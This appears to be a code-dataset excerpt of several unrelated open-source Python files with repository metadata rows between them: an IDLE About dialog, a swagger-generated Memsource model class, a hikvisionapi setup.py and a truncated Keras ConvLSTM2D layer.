labelDesc.grid(row=2, column=0, sticky=W, columnspan=3, padx=10, pady=5)
labelEmail = Label(frameBg, text='email: idle-dev@python.org',
justify=LEFT, fg=self.fg, bg=self.bg)
labelEmail.grid(row=6, column=0, columnspan=2,
sticky=W, padx=10, pady=0)
labelWWW = Label(frameBg, text='https://docs.python.org/' +
sys.version[:3] + '/library/idle.html',
justify=LEFT, fg=self.fg, bg=self.bg)
labelWWW.grid(row=7, column=0, columnspan=2, sticky=W, padx=10, pady=0)
Frame(frameBg, borderwidth=1, relief=SUNKEN,
height=2, bg=self.bg).grid(row=8, column=0, sticky=EW,
columnspan=3, padx=5, pady=5)
labelPythonVer = Label(frameBg, text='Python version: ' + \
sys.version.split()[0], fg=self.fg, bg=self.bg)
labelPythonVer.grid(row=9, column=0, sticky=W, padx=10, pady=0)
tkVer = self.tk.call('info', 'patchlevel')
labelTkVer = Label(frameBg, text='Tk version: '+
tkVer, fg=self.fg, bg=self.bg)
labelTkVer.grid(row=9, column=1, sticky=W, padx=2, pady=0)
py_button_f = Frame(frameBg, bg=self.bg)
py_button_f.grid(row=10, column=0, columnspan=2, sticky=NSEW)
buttonLicense = Button(py_button_f, text='License', width=8,
highlightbackground=self.bg,
command=self.ShowLicense)
buttonLicense.pack(side=LEFT, padx=10, pady=10)
buttonCopyright = Button(py_button_f, text='Copyright', width=8,
highlightbackground=self.bg,
command=self.ShowCopyright)
buttonCopyright.pack(side=LEFT, padx=10, pady=10)
buttonCredits = Button(py_button_f, text='Credits', width=8,
highlightbackground=self.bg,
command=self.ShowPythonCredits)
buttonCredits.pack(side=LEFT, padx=10, pady=10)
Frame(frameBg, borderwidth=1, relief=SUNKEN,
height=2, bg=self.bg).grid(row=11, column=0, sticky=EW,
columnspan=3, padx=5, pady=5)
idle_v = Label(frameBg, text='IDLE version: ' + idlever.IDLE_VERSION,
fg=self.fg, bg=self.bg)
idle_v.grid(row=12, column=0, sticky=W, padx=10, pady=0)
idle_button_f = Frame(frameBg, bg=self.bg)
idle_button_f.grid(row=13, column=0, columnspan=3, sticky=NSEW)
idle_about_b = Button(idle_button_f, text='README', width=8,
highlightbackground=self.bg,
command=self.ShowIDLEAbout)
idle_about_b.pack(side=LEFT, padx=10, pady=10)
idle_news_b = Button(idle_button_f, text='NEWS', width=8,
highlightbackground=self.bg,
command=self.ShowIDLENEWS)
idle_news_b.pack(side=LEFT, padx=10, pady=10)
idle_credits_b = Button(idle_button_f, text='Credits', width=8,
highlightbackground=self.bg,
command=self.ShowIDLECredits)
idle_credits_b.pack(side=LEFT, padx=10, pady=10)
def ShowLicense(self):
self.display_printer_text('About - License', license)
def ShowCopyright(self):
self.display_printer_text('About - Copyright', copyright)
def ShowPythonCredits(self):
self.display_printer_text('About - Python Credits', credits)
def ShowIDLECredits(self):
self.display_file_text('About - Credits', 'CREDITS.txt', 'iso-8859-1')
def ShowIDLEAbout(self):
self.display_file_text('About - Readme', 'README.txt')
def ShowIDLENEWS(self):
self.display_file_text('About - NEWS', 'NEWS.txt')
def display_printer_text(self, title, printer):
printer._Printer__setup()
text = '\n'.join(printer._Printer__lines)
textView.view_text(self, title, text)
def display_file_text(self, title, filename, encoding=None):
fn = os.path.join(os.path.abspath(os.path.dirname(__file__)), filename)
textView.view_file(self, title, fn, encoding)
def Ok(self, event=None):
self.destroy()
if __name__ == '__main__':
from idlelib.idle_test.htest import run
run(AboutDialog)
| 45.442177
| 80
| 0.582186
|
from Tkinter import *
import os
from idlelib import textView
from idlelib import idlever
class AboutDialog(Toplevel):
def __init__(self, parent, title, _htest=False):
Toplevel.__init__(self, parent)
self.configure(borderwidth=5)
self.geometry("+%d+%d" % (
parent.winfo_rootx()+30,
parent.winfo_rooty()+(30 if not _htest else 100)))
self.bg = "#707070"
self.fg = "#ffffff"
self.CreateWidgets()
self.resizable(height=FALSE, width=FALSE)
self.title(title)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Ok)
self.parent = parent
self.buttonOk.focus_set()
self.bind('<Return>',self.Ok)
self.bind('<Escape>',self.Ok)
self.wait_window()
def CreateWidgets(self):
frameMain = Frame(self, borderwidth=2, relief=SUNKEN)
frameButtons = Frame(self)
frameButtons.pack(side=BOTTOM, fill=X)
frameMain.pack(side=TOP, expand=TRUE, fill=BOTH)
self.buttonOk = Button(frameButtons, text='Close',
command=self.Ok)
self.buttonOk.pack(padx=5, pady=5)
frameBg = Frame(frameMain, bg=self.bg)
frameBg.pack(expand=TRUE, fill=BOTH)
labelTitle = Label(frameBg, text='IDLE', fg=self.fg, bg=self.bg,
font=('courier', 24, 'bold'))
labelTitle.grid(row=0, column=0, sticky=W, padx=10, pady=10)
byline = "Python's Integrated DeveLopment Environment" + 5*'\n'
labelDesc = Label(frameBg, text=byline, justify=LEFT,
fg=self.fg, bg=self.bg)
labelDesc.grid(row=2, column=0, sticky=W, columnspan=3, padx=10, pady=5)
labelEmail = Label(frameBg, text='email: idle-dev@python.org',
justify=LEFT, fg=self.fg, bg=self.bg)
labelEmail.grid(row=6, column=0, columnspan=2,
sticky=W, padx=10, pady=0)
labelWWW = Label(frameBg, text='https://docs.python.org/' +
sys.version[:3] + '/library/idle.html',
justify=LEFT, fg=self.fg, bg=self.bg)
labelWWW.grid(row=7, column=0, columnspan=2, sticky=W, padx=10, pady=0)
Frame(frameBg, borderwidth=1, relief=SUNKEN,
height=2, bg=self.bg).grid(row=8, column=0, sticky=EW,
columnspan=3, padx=5, pady=5)
labelPythonVer = Label(frameBg, text='Python version: ' + \
sys.version.split()[0], fg=self.fg, bg=self.bg)
labelPythonVer.grid(row=9, column=0, sticky=W, padx=10, pady=0)
tkVer = self.tk.call('info', 'patchlevel')
labelTkVer = Label(frameBg, text='Tk version: '+
tkVer, fg=self.fg, bg=self.bg)
labelTkVer.grid(row=9, column=1, sticky=W, padx=2, pady=0)
py_button_f = Frame(frameBg, bg=self.bg)
py_button_f.grid(row=10, column=0, columnspan=2, sticky=NSEW)
buttonLicense = Button(py_button_f, text='License', width=8,
highlightbackground=self.bg,
command=self.ShowLicense)
buttonLicense.pack(side=LEFT, padx=10, pady=10)
buttonCopyright = Button(py_button_f, text='Copyright', width=8,
highlightbackground=self.bg,
command=self.ShowCopyright)
buttonCopyright.pack(side=LEFT, padx=10, pady=10)
buttonCredits = Button(py_button_f, text='Credits', width=8,
highlightbackground=self.bg,
command=self.ShowPythonCredits)
buttonCredits.pack(side=LEFT, padx=10, pady=10)
Frame(frameBg, borderwidth=1, relief=SUNKEN,
height=2, bg=self.bg).grid(row=11, column=0, sticky=EW,
columnspan=3, padx=5, pady=5)
idle_v = Label(frameBg, text='IDLE version: ' + idlever.IDLE_VERSION,
fg=self.fg, bg=self.bg)
idle_v.grid(row=12, column=0, sticky=W, padx=10, pady=0)
idle_button_f = Frame(frameBg, bg=self.bg)
idle_button_f.grid(row=13, column=0, columnspan=3, sticky=NSEW)
idle_about_b = Button(idle_button_f, text='README', width=8,
highlightbackground=self.bg,
command=self.ShowIDLEAbout)
idle_about_b.pack(side=LEFT, padx=10, pady=10)
idle_news_b = Button(idle_button_f, text='NEWS', width=8,
highlightbackground=self.bg,
command=self.ShowIDLENEWS)
idle_news_b.pack(side=LEFT, padx=10, pady=10)
idle_credits_b = Button(idle_button_f, text='Credits', width=8,
highlightbackground=self.bg,
command=self.ShowIDLECredits)
idle_credits_b.pack(side=LEFT, padx=10, pady=10)
def ShowLicense(self):
self.display_printer_text('About - License', license)
def ShowCopyright(self):
self.display_printer_text('About - Copyright', copyright)
def ShowPythonCredits(self):
self.display_printer_text('About - Python Credits', credits)
def ShowIDLECredits(self):
self.display_file_text('About - Credits', 'CREDITS.txt', 'iso-8859-1')
def ShowIDLEAbout(self):
self.display_file_text('About - Readme', 'README.txt')
def ShowIDLENEWS(self):
self.display_file_text('About - NEWS', 'NEWS.txt')
def display_printer_text(self, title, printer):
printer._Printer__setup()
text = '\n'.join(printer._Printer__lines)
textView.view_text(self, title, text)
def display_file_text(self, title, filename, encoding=None):
fn = os.path.join(os.path.abspath(os.path.dirname(__file__)), filename)
textView.view_file(self, title, fn, encoding)
def Ok(self, event=None):
self.destroy()
if __name__ == '__main__':
from idlelib.idle_test.htest import run
run(AboutDialog)
| true
| true
|
1c3eba29dfde112cc3cbe366acda5cf030a01733
| 5,117
|
py
|
Python
|
memsource_cli/models/lqa_settings_dto.py
|
unofficial-memsource/memsource-cli-client
|
a6639506b74e95476da87f4375953448b76ea90c
|
[
"Apache-2.0"
] | 16
|
2019-09-25T00:20:38.000Z
|
2021-05-04T05:56:10.000Z
|
memsource_cli/models/lqa_settings_dto.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 26
|
2019-09-30T14:00:03.000Z
|
2021-05-12T11:15:18.000Z
|
memsource_cli/models/lqa_settings_dto.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 1
|
2021-05-24T16:19:14.000Z
|
2021-05-24T16:19:14.000Z
|
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:support@memsource.com>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from memsource_cli.models.lqa_error_category_dto import LqaErrorCategoryDto # noqa: F401,E501
from memsource_cli.models.lqa_severity_dto import LqaSeverityDto # noqa: F401,E501
class LqaSettingsDto(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'enabled': 'bool',
'severities': 'list[LqaSeverityDto]',
'categories': 'list[LqaErrorCategoryDto]'
}
attribute_map = {
'enabled': 'enabled',
'severities': 'severities',
'categories': 'categories'
}
def __init__(self, enabled=None, severities=None, categories=None): # noqa: E501
"""LqaSettingsDto - a model defined in Swagger""" # noqa: E501
self._enabled = None
self._severities = None
self._categories = None
self.discriminator = None
if enabled is not None:
self.enabled = enabled
if severities is not None:
self.severities = severities
if categories is not None:
self.categories = categories
@property
def enabled(self):
"""Gets the enabled of this LqaSettingsDto. # noqa: E501
:return: The enabled of this LqaSettingsDto. # noqa: E501
:rtype: bool
"""
return self._enabled
@enabled.setter
def enabled(self, enabled):
"""Sets the enabled of this LqaSettingsDto.
:param enabled: The enabled of this LqaSettingsDto. # noqa: E501
:type: bool
"""
self._enabled = enabled
@property
def severities(self):
"""Gets the severities of this LqaSettingsDto. # noqa: E501
:return: The severities of this LqaSettingsDto. # noqa: E501
:rtype: list[LqaSeverityDto]
"""
return self._severities
@severities.setter
def severities(self, severities):
"""Sets the severities of this LqaSettingsDto.
:param severities: The severities of this LqaSettingsDto. # noqa: E501
:type: list[LqaSeverityDto]
"""
self._severities = severities
@property
def categories(self):
"""Gets the categories of this LqaSettingsDto. # noqa: E501
:return: The categories of this LqaSettingsDto. # noqa: E501
:rtype: list[LqaErrorCategoryDto]
"""
return self._categories
@categories.setter
def categories(self, categories):
"""Sets the categories of this LqaSettingsDto.
:param categories: The categories of this LqaSettingsDto. # noqa: E501
:type: list[LqaErrorCategoryDto]
"""
self._categories = categories
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(LqaSettingsDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LqaSettingsDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 29.923977
| 421
| 0.601133
|
import pprint
import re
import six
from memsource_cli.models.lqa_error_category_dto import LqaErrorCategoryDto
from memsource_cli.models.lqa_severity_dto import LqaSeverityDto
class LqaSettingsDto(object):
swagger_types = {
'enabled': 'bool',
'severities': 'list[LqaSeverityDto]',
'categories': 'list[LqaErrorCategoryDto]'
}
attribute_map = {
'enabled': 'enabled',
'severities': 'severities',
'categories': 'categories'
}
def __init__(self, enabled=None, severities=None, categories=None):
self._enabled = None
self._severities = None
self._categories = None
self.discriminator = None
if enabled is not None:
self.enabled = enabled
if severities is not None:
self.severities = severities
if categories is not None:
self.categories = categories
@property
def enabled(self):
return self._enabled
@enabled.setter
def enabled(self, enabled):
self._enabled = enabled
@property
def severities(self):
return self._severities
@severities.setter
def severities(self, severities):
self._severities = severities
@property
def categories(self):
return self._categories
@categories.setter
def categories(self, categories):
self._categories = categories
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(LqaSettingsDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, LqaSettingsDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
1c3eba7512c64be760bcd42530a076ee253a07df
| 827
|
py
|
Python
|
setup.py
|
keshavdv/hikvision-client
|
dbebe399ea5ecbbd236488cda28242d134a9f72f
|
[
"MIT"
] | null | null | null |
setup.py
|
keshavdv/hikvision-client
|
dbebe399ea5ecbbd236488cda28242d134a9f72f
|
[
"MIT"
] | null | null | null |
setup.py
|
keshavdv/hikvision-client
|
dbebe399ea5ecbbd236488cda28242d134a9f72f
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
from os.path import join, dirname
import re
with open('hikvisionapi/__init__.py', 'r') as fd:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
setup(name='hikvisionapi',
version=version,
description='The client for HIKVISION cameras, DVR',
url='https://github.com/MissiaL/hikvision-client',
author='Petr Alekseev',
author_email='petrmissial@gmail.com',
packages=find_packages(),
long_description=open(join(dirname(__file__), 'README.md')).read(),
download_url='https://github.com/MissiaL/hikvision-client/tarball/{}'.format(version),
keywords=['api', 'hikvision', 'hikvision-client'],
install_requires=['xmltodict', 'requests', 'httpx']
)
| 39.380952
| 92
| 0.650544
|
from setuptools import setup, find_packages
from os.path import join, dirname
import re
with open('hikvisionapi/__init__.py', 'r') as fd:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
setup(name='hikvisionapi',
version=version,
description='The client for HIKVISION cameras, DVR',
url='https://github.com/MissiaL/hikvision-client',
author='Petr Alekseev',
author_email='petrmissial@gmail.com',
packages=find_packages(),
long_description=open(join(dirname(__file__), 'README.md')).read(),
download_url='https://github.com/MissiaL/hikvision-client/tarball/{}'.format(version),
keywords=['api', 'hikvision', 'hikvision-client'],
install_requires=['xmltodict', 'requests', 'httpx']
)
| true
| true
|
1c3eba76465db2b8dee9184bb19fce222cfaebed
| 21,677
|
py
|
Python
|
keras/layers/convolutional_recurrent.py
|
ypxie/keras-1
|
f1ed8d63faa26ce6180faa685839aa32217211c6
|
[
"MIT"
] | 1
|
2017-11-15T14:52:07.000Z
|
2017-11-15T14:52:07.000Z
|
keras/layers/convolutional_recurrent.py
|
ypxie/keras-1
|
f1ed8d63faa26ce6180faa685839aa32217211c6
|
[
"MIT"
] | null | null | null |
keras/layers/convolutional_recurrent.py
|
ypxie/keras-1
|
f1ed8d63faa26ce6180faa685839aa32217211c6
|
[
"MIT"
] | 1
|
2021-05-01T09:39:57.000Z
|
2021-05-01T09:39:57.000Z
|
from .. import backend as K
from .. import activations, initializations, regularizers
import numpy as np
from ..engine import Layer, InputSpec
from ..utils.np_utils import conv_output_length
import warnings
class ConvRecurrent2D(Layer):
'''Abstract base class for convolutional recurrent layers.
Do not use in a model -- it's not a functional layer!
ConvLSTM2D
follow the specifications of this class and accept
the keyword arguments listed below.
# Input shape
5D tensor with shape `(nb_samples, timesteps, channels, rows, cols)`.
# Output shape
- if `return_sequences`: 5D tensor with shape
`(nb_samples, timesteps, channels, rows, cols)`.
- else, 4D tensor with shape `(nb_samples, channels, rows, cols)`.
# Arguments
weights: list of numpy arrays to set as initial weights.
The list should have 3 elements, of shapes:
`[(input_dim, nb_filter), (nb_filter, nb_filter), (nb_filter,)]`.
return_sequences: Boolean. Whether to return the last output
in the output sequence, or the full sequence.
go_backwards: Boolean (default False).
If True, rocess the input sequence backwards.
stateful: Boolean (default False). If True, the last state
for each sample at index i in a batch will be used as initial
state for the sample of index i in the following batch.
nb_filter: Number of convolution filters to use.
nb_row: Number of rows in the convolution kernel.
nb_col: Number of columns in the convolution kernel.
is required when using this layer as the first layer in a model.
input_shape: input_shape
# Masking
This layer supports masking for input data with a variable number
of timesteps. To introduce masks to your data,
use an [Embedding](embeddings.md) layer with the `mask_zero` parameter
set to `True`.
**Note:** for the time being, masking is only supported with Theano.
# TensorFlow warning
For the time being, when using the TensorFlow backend,
the number of timesteps used must be specified in your model.
Make sure to pass an `input_length` int argument to your
recurrent layer (if it comes first in your model),
or to pass a complete `input_shape` argument to the first layer
in your model otherwise.
# Note on using statefulness in RNNs
You can set RNN layers to be 'stateful', which means that the states
computed for the samples in one batch will be reused as initial states
for the samples in the next batch.
This assumes a one-to-one mapping between
samples in different successive batches.
To enable statefulness:
- specify `stateful=True` in the layer constructor.
- specify a fixed batch size for your model, by passing
a `batch_input_size=(...)` to the first layer in your model.
This is the expected shape of your inputs *including the batch
size*.
It should be a tuple of integers, e.g. `(32, 10, 100)`.
To reset the states of your model, call `.reset_states()` on either
a specific layer, or on your entire model.
'''
def __init__(self, weights=None, nb_row=None, nb_col=None, nb_filter=None,
return_sequences=False, go_backwards=False, stateful=False,
dim_ordering=None, **kwargs):
self.return_sequences = return_sequences
self.go_backwards = go_backwards
self.stateful = stateful
self.initial_weights = weights
self.nb_row = nb_row
self.nb_col = nb_col
self.nb_filter = nb_filter
self.dim_ordering = dim_ordering
self.input_spec = [InputSpec(ndim=5)]
super(ConvRecurrent2D, self).__init__(**kwargs)
def compute_mask(self, input, mask):
if self.return_sequences:
return mask
else:
return None
def get_output_shape_for(self, input_shape):
if self.dim_ordering == 'th':
rows = input_shape[3]
cols = input_shape[4]
elif self.dim_ordering == 'tf':
rows = input_shape[2]
cols = input_shape[3]
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
rows = conv_output_length(rows, self.nb_row,
self.border_mode, self.subsample[0])
cols = conv_output_length(cols, self.nb_col,
self.border_mode, self.subsample[1])
if self.return_sequences:
if self.dim_ordering == 'th':
return (input_shape[0], input_shape[1],
self.nb_filter, rows, cols)
elif self.dim_ordering == 'tf':
return (input_shape[0], input_shape[1],
rows, cols, self.nb_filter)
else:
if self.dim_ordering == 'th':
return (input_shape[0], self.nb_filter, rows, cols)
elif self.dim_ordering == 'tf':
return (input_shape[0], rows, cols, self.nb_filter)
def step(self, x, states):
raise NotImplementedError
def get_constants(self, X, train=False):
return None
def get_initial_states(self, X):
# (samples, timesteps, row, col, filter)
initial_state = K.zeros_like(X)
# (samples,row, col, filter)
initial_state = K.sum(initial_state, axis=1)
initial_state = self.conv_step(initial_state, K.zeros(self.W_shape),
border_mode=self.border_mode)
initial_states = [initial_state for _ in range(2)]
return initial_states
def preprocess_input(self, x):
return x
def call(self, x, mask=None):
assert K.ndim(x) == 5
input_shape = self.input_spec[0].shape
unroll = False
if self.stateful:
initial_states = self.states
else:
initial_states = self.get_initial_states(x)
constants = self.get_constants(x)
preprocessed_input = self.preprocess_input(x)
last_output, outputs, states = K.rnn(self.step, preprocessed_input,
initial_states,
go_backwards=self.go_backwards,
mask=mask,
constants=constants,
unroll=unroll,
input_length=input_shape[1])
if self.stateful:
self.updates = []
for i in range(len(states)):
self.updates.append((self.states[i], states[i]))
if self.return_sequences:
return outputs
else:
return last_output
def get_config(self):
config = {'return_sequences': self.return_sequences,
'go_backwards': self.go_backwards,
'stateful': self.stateful}
if self.stateful:
config['batch_input_shape'] = self.input_spec[0].shape
base_config = super(ConvRecurrent2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ConvLSTM2D(ConvRecurrent2D):
'''Convolutional LSTM.
# Input shape
- if dim_ordering='th'
5D tensor with shape:
`(samples,time, channels, rows, cols)`
- if dim_ordering='tf'
5D tensor with shape:
`(samples,time, rows, cols, channels)`
# Output shape
- if `return_sequences`
- if dim_ordering='th'
5D tensor with shape:
`(samples, time, nb_filter, output_row, output_col)`
- if dim_ordering='tf'
5D tensor with shape:
`(samples, time, output_row, output_col, nb_filter)`
- else
- if dim_ordering ='th'
4D tensor with shape:
`(samples, nb_filter, output_row, output_col)`
- if dim_ordering='tf'
4D tensor with shape:
`(samples, output_row, output_col, nb_filter)`
where o_row and o_col depend on the shape of the filter and
the border_mode
# Arguments
nb_filter: Number of convolution filters to use.
nb_row: Number of rows in the convolution kernel.
nb_col: Number of columns in the convolution kernel.
border_mode: 'valid' or 'same'.
subsample: tuple of length 2. Factor by which to subsample output.
Also called strides elsewhere.
dim_ordering: 'tf' if the feature are at the last dimension or 'th'
stateful : Boolean (default False). If True, the last state
for each sample at index i in a batch will be used as initial
state for the sample of index i in the following batch.
init: weight initialization function.
Can be the name of an existing function (str),
or a Theano function
(see: [initializations](../initializations.md)).
inner_init: initialization function of the inner cells.
forget_bias_init: initialization function for the bias of the
forget gate.
[Jozefowicz et al.](http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf)
recommend initializing with ones.
activation: activation function.
Can be the name of an existing function (str),
or a Theano function (see: [activations](../activations.md)).
inner_activation: activation function for the inner cells.
# References
- [Convolutional LSTM Network: A Machine Learning Approach for
Precipitation Nowcasting](http://arxiv.org/pdf/1506.04214v1.pdf)
The current implementation does not include the feedback loop on the
cells output
'''
def __init__(self, nb_filter, nb_row, nb_col,
init='glorot_uniform', inner_init='orthogonal',
forget_bias_init='one', activation='tanh',
inner_activation='hard_sigmoid',
dim_ordering='default',
border_mode='valid', subsample=(1, 1),
W_regularizer=None, U_regularizer=None, b_regularizer=None,
dropout_W=0., dropout_U=0., **kwargs):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
if dim_ordering not in {'tf', 'th'}:
raise ValueError('dim_ordering must be in {tf,th}', dim_ordering)
self.nb_filter = nb_filter
self.nb_row = nb_row
self.nb_col = nb_col
self.init = initializations.get(init)
self.inner_init = initializations.get(inner_init)
self.forget_bias_init = initializations.get(forget_bias_init)
self.activation = activations.get(activation)
self.inner_activation = activations.get(inner_activation)
self.border_mode = border_mode
self.subsample = subsample
if dim_ordering == 'th':
warnings.warn('Be carefull if used with convolution3D layers:\n'
'th in convolution 3D corresponds to '
'(samples, channels, conv_dim1, conv_dim2,'
'conv_dim3)\n'
'while for this network it corresponds to: '
'(samples, time, channels, rows, cols)')
self.dim_ordering = dim_ordering
kwargs['nb_filter'] = nb_filter
kwargs['nb_row'] = nb_row
kwargs['nb_col'] = nb_col
kwargs['dim_ordering'] = dim_ordering
self.W_regularizer = regularizers.get(W_regularizer)
self.U_regularizer = regularizers.get(U_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.dropout_W, self.dropout_U = dropout_W, dropout_U
if self.dropout_W or self.dropout_U:
self.uses_learning_phase = True
super(ConvLSTM2D, self).__init__(**kwargs)
def build(self, input_shape):
self.input_spec = [InputSpec(shape=input_shape)]
if self.dim_ordering == 'th':
stack_size = input_shape[2]
self.W_shape = (self.nb_filter, stack_size,
self.nb_row, self.nb_col)
elif self.dim_ordering == 'tf':
stack_size = input_shape[4]
self.W_shape = (self.nb_row, self.nb_col,
stack_size, self.nb_filter)
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
if self.dim_ordering == 'th':
self.W_shape1 = (self.nb_filter, self.nb_filter,
self.nb_row, self.nb_col)
elif self.dim_ordering == 'tf':
self.W_shape1 = (self.nb_row, self.nb_col,
self.nb_filter, self.nb_filter)
if self.stateful:
self.reset_states()
else:
# initial states: 2 all-zero tensor of shape (nb_filter)
self.states = [None, None, None, None]
self.W_i = self.init(self.W_shape, name='{}_W_i'.format(self.name))
self.U_i = self.inner_init(self.W_shape1,
name='{}_U_i'.format(self.name))
self.b_i = K.zeros((self.nb_filter,), name='{}_b_i'.format(self.name))
self.W_f = self.init(self.W_shape, name='{}_W_f'.format(self.name))
self.U_f = self.inner_init(self.W_shape1,
name='{}_U_f'.format(self.name))
self.b_f = self.forget_bias_init((self.nb_filter,),
name='{}_b_f'.format(self.name))
self.W_c = self.init(self.W_shape, name='{}_W_c'.format(self.name))
self.U_c = self.inner_init(self.W_shape1,
name='{}_U_c'.format(self.name))
self.b_c = K.zeros((self.nb_filter,), name='{}_b_c'.format(self.name))
self.W_o = self.init(self.W_shape, name='{}_W_o'.format(self.name))
self.U_o = self.inner_init(self.W_shape1,
name='{}_U_o'.format(self.name))
self.b_o = K.zeros((self.nb_filter,), name='{}_b_o'.format(self.name))
self.trainable_weights = [self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o]
self.W = K.concatenate([self.W_i, self.W_f, self.W_c, self.W_o])
self.U = K.concatenate([self.U_i, self.U_f, self.U_c, self.U_o])
self.b = K.concatenate([self.b_i, self.b_f, self.b_c, self.b_o])
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.U_regularizer:
self.U_regularizer.set_param(self.U)
self.regularizers.append(self.U_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
self.built = True
def reset_states(self):
assert self.stateful, 'Layer must be stateful.'
input_shape = self.input_spec[0].shape
output_shape = self.get_output_shape_for(input_shape)
if not input_shape[0]:
raise ValueError('If a RNN is stateful, a complete ' +
'input_shape must be provided ' +
'(including batch size).')
if self.return_sequences:
out_row, out_col, out_filter = output_shape[2:]
else:
out_row, out_col, out_filter = output_shape[1:]
if hasattr(self, 'states'):
K.set_value(self.states[0],
np.zeros((input_shape[0],
out_row, out_col, out_filter)))
K.set_value(self.states[1],
np.zeros((input_shape[0],
out_row, out_col, out_filter)))
else:
self.states = [K.zeros((input_shape[0],
out_row, out_col, out_filter)),
K.zeros((input_shape[0],
out_row, out_col, out_filter))]
def conv_step(self, x, W, b=None, border_mode='valid'):
input_shape = self.input_spec[0].shape
conv_out = K.conv2d(x, W, strides=self.subsample,
border_mode=border_mode,
dim_ordering=self.dim_ordering,
image_shape=(input_shape[0],
input_shape[2],
input_shape[3],
input_shape[4]),
filter_shape=self.W_shape)
if b:
if self.dim_ordering == 'th':
conv_out = conv_out + K.reshape(b, (1, self.nb_filter, 1, 1))
elif self.dim_ordering == 'tf':
conv_out = conv_out + K.reshape(b, (1, 1, 1, self.nb_filter))
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
return conv_out
def conv_step_hidden(self, x, W, border_mode='valid'):
# This new function was defined because the
# image shape must be hardcoded
input_shape = self.input_spec[0].shape
output_shape = self.get_output_shape_for(input_shape)
if self.return_sequences:
out_row, out_col, out_filter = output_shape[2:]
else:
out_row, out_col, out_filter = output_shape[1:]
conv_out = K.conv2d(x, W, strides=(1, 1),
border_mode=border_mode,
dim_ordering=self.dim_ordering,
image_shape=(input_shape[0],
out_row, out_col,
out_filter),
filter_shape=self.W_shape1)
return conv_out
def step(self, x, states):
assert len(states) == 4
h_tm1 = states[0]
c_tm1 = states[1]
B_U = states[2]
B_W = states[3]
x_i = self.conv_step(x * B_W[0], self.W_i, self.b_i,
border_mode=self.border_mode)
x_f = self.conv_step(x * B_W[1], self.W_f, self.b_f,
border_mode=self.border_mode)
x_c = self.conv_step(x * B_W[2], self.W_c, self.b_c,
border_mode=self.border_mode)
x_o = self.conv_step(x * B_W[3], self.W_o, self.b_o,
border_mode=self.border_mode)
# U : from nb_filter to nb_filter
# Same because must be stable in the output space
h_i = self.conv_step_hidden(h_tm1 * B_U[0], self.U_i,
border_mode='same')
h_f = self.conv_step_hidden(h_tm1 * B_U[1], self.U_f,
border_mode='same')
h_c = self.conv_step_hidden(h_tm1 * B_U[2], self.U_c,
border_mode='same')
h_o = self.conv_step_hidden(h_tm1 * B_U[3], self.U_o,
border_mode='same')
i = self.inner_activation(x_i + h_i)
f = self.inner_activation(x_f + h_f)
c = f * c_tm1 + i * self.activation(x_c + h_c)
o = self.inner_activation(x_o + h_o)
h = o * self.activation(c)
return h, [h, c]
def get_constants(self, x):
constants = []
if 0 < self.dropout_U < 1:
ones = K.zeros_like(x)
ones = K.sum(ones, axis=1)
